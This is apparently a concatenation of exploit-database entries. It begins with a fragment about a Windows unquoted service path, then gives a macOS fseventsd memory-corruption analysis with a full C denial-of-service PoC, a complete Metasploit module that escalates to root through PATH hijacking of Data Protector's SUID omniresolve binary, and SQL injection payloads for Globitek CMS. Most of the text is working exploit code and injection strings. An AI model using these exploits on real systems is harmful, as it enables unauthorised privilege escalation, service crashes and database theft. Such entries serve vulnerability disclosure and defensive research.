Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> #Exploit: ============ A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC) # Date: 2019-11-02 # Exploit Author: 08Tc3wBB # Vendor Homepage: Apple # Software Link: # Version: Apple macOS < 10.15.1 / iOS < 13.2 # Tested on: Tested on macOS 10.14.6 and iOS 12.4.1 # CVE : N/A # Type : DOS # https://support.apple.com/en-us/HT210721 ----- Execution file path: /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox. ----- Analysis Env: macOS 10.14.6 I named following pseudocode functions to help you understand the execution flow. void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285 { ... v9 = implementation_register_rpc( msg->msgh_local_port, msg[1].msgh_size, msg[4].msgh_reserved, (unsigned int)msg[4].msgh_id, *(_QWORD *)&msg[1].msgh_reserved, // input_mem1 msg[2].msgh_size >> 2, // input_mem1_len *(_QWORD *)&msg[2].msgh_remote_port, // input_mem2 msg[2].msgh_id, // input_mem2_len msg[5].msgh_remote_port, *(_QWORD *)&msg[3].msgh_bits, // input_mem3 msg[3].msgh_local_port >> 2, // input_mem3_len *(_QWORD *)&msg[3].msgh_reserved, // input_mem4 msg[4].msgh_size); // input_mem4_len ... } routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0 And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2 I marked five places with: (1) (2) (3) (4) (5) These are the essential points cause this vulnerability. void *fsevent_add_client(...) { ... v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content. *(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136) ... v20 = ... // v20 point to an array of strings that was created based on user input // The following process is doing recursive parsing to v20 index = 0LL; while ( 1 ) { v26 = *(const char **)(v20 + 8 * index); ... v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid"); v27 = v26; if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup goto LABEL_15; if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16 goto LABEL_16; *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid"); LABEL_17: if ( ++index >= input_mem1_len ) goto LABEL_21; } v27 = *(const char **)(v20 + 8 * index); LABEL_15: *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27); LABEL_16: if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) ) goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string ... // (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data. } However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg. ----- PoC // clang poc.c -framework CoreFoundation -o poc #include <stdio.h> #include <xpc/xpc.h> #include <CoreFoundation/CoreFoundation.h> #include <bootstrap.h> mach_port_t server_port = 0; mach_port_t get_server_port(){ if(server_port) return server_port; bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port); return server_port; } int trigger_bug = 0; int has_reach_limit = 0; uint32_t call_routine_1(){ struct SEND_Msg{ mach_msg_header_t Head; mach_msg_body_t msgh_body; mach_msg_port_descriptor_t port; mach_msg_ool_descriptor_t mem1; mach_msg_ool_descriptor_t mem2; mach_msg_ool_descriptor_t mem3; mach_msg_ool_descriptor_t mem4; // Offset to here : +104 uint64_t unused_field1; uint32_t input_num1; // +112 uint32_t input_num2; // +116 uint64_t len_auth1; // +120 length of mem1/mem2 uint32_t input_num3; // +128 uint64_t len_auth2; // +132 length of mem3/mem4 char unused_field[20]; }; struct RECV_Msg{ mach_msg_header_t Head; // Size: 24 mach_msg_body_t msgh_body; mach_msg_port_descriptor_t port; uint64_t NDR_record; }; struct SEND_Msg *msg = malloc(0x100); bzero(msg, 0x100); msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND); msg->Head.msgh_size = 160; int kkk = get_server_port(); msg->Head.msgh_remote_port = kkk; msg->Head.msgh_local_port = mig_get_reply_port(); msg->Head.msgh_id = 0x101D0; msg->msgh_body.msgh_descriptor_count = 5; msg->port.type = MACH_MSG_PORT_DESCRIPTOR; msg->mem1.deallocate = false; msg->mem1.copy = MACH_MSG_VIRTUAL_COPY; msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR; memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1)); memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1)); memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1)); mach_port_t port1=0; mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1); msg->port.name = port1; msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND; uint64_t empty_data = 0; if(trigger_bug){ msg->input_num1 = 5; msg->mem1.address = &empty_data; msg->mem1.size = 4; msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth msg->mem2.address = "/.docid1"; msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1; } else{ msg->input_num1 = 1; msg->mem1.address = &empty_data; msg->mem1.size = 4; msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth msg->mem2.address = "/.dacid1"; msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1; } msg->mem3.address = 0; msg->mem3.size = 0; msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth msg->mem4.address = 0; msg->mem4.size = 0; msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2); msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2); mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0); int32_t errCode = *(int32_t*)(((char*)msg) + 0x20); if(errCode == -21){ has_reach_limit = 1; } mig_dealloc_reply_port(msg->Head.msgh_local_port); struct RECV_Msg *recv_msg = (void*)msg; uint32_t return_port = recv_msg->port.name; free(msg); return return_port; } int main(int argc, const char * argv[]) { printf("PoC started running...\n"); uint32_t aaa[1000]; for(int i=0; i<=1000; i++){ if(has_reach_limit){ trigger_bug = 1; call_routine_1(); break; } aaa[i] = call_routine_1(); } printf("Finished\n"); printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n"); return 0; }

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation', 'Description' => %q{ This module exploits the trusted `$PATH` environment variable of the SUID binary `omniresolve` in Micro Focus (HPE) Data Protector A.10.40 and prior. The `omniresolve` executable calls the `oracleasm` binary using a relative path and the trusted environment `$PATH`, which allows an attacker to execute a custom binary with `root` privileges. This module has been successfully tested on: HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016; Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core) The vulnerability has been patched in: Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019 }, 'License' => MSF_LICENSE, 'Author' => [ 's7u55', # Discovery and Metasploit module ], 'DisclosureDate' => '2019-09-13', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Micro Focus (HPE) Data Protector <= 10.40 build 118', upper_version: Gem::Version.new('10.40') ] ], 'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true }, 'References' => [ [ 'CVE', '2019-11660' ], [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ] ] )) register_options( [ OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ]) ]) register_advanced_options( [ OptBool.new('ForceExploit', [ false, 'Override check result', false ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ]) end def base_dir datastore['WritableDir'].to_s end def suid_bin_path datastore['SUID_PATH'].to_s end def check unless setuid? suid_bin_path vprint_error("#{suid_bin_path} executable is not setuid") return CheckCode::Safe end info = cmd_exec("#{suid_bin_path} -ver").to_s if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/ version = '%.2f' % $1.to_f build = $3.to_i vprint_status("omniresolve version #{version} build #{build}") unless Gem::Version.new(version) < target[:upper_version] || (Gem::Version.new(version) == target[:upper_version] && build <= 118) return CheckCode::Safe end return CheckCode::Appears end vprint_error("Could not parse omniresolve -ver output") CheckCode::Detected end def exploit if check == CheckCode::Safe unless datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.') end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.') end end unless writable?(base_dir) fail_with(Failure::BadConfig, "#{base_dir} is not writable") end payload_path = File.join(base_dir, 'oracleasm') register_file_for_cleanup(payload_path) write_file(payload_path, generate_payload_exe) chmod(payload_path) trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) register_file_for_cleanup(trigger_path) write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}") cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ") end end

# Exploit Title: thejshen Globitek CMS 1.4 - 'id' SQL Injection # Date: 2019-11-01 # Exploit Author: Cakes # Vendor Homepage: https://github.com/thejshen/contentManagementSystem # Software Link: https://github.com/thejshen/contentManagementSystem.git # Version: 1.4 # Tested on: CentOS 7 # CVE: N/A # The GET request for content ID is vulnerable to Union, Bolean and Time-Based Blind SQL injection # Parameter: id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Vector: AND [INFERENCE] Payload: id=4' AND 5143=5143-- OWXt # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG # Type: UNION query # Title: Generic UNION query (NULL) - 5 columns # Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT] Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh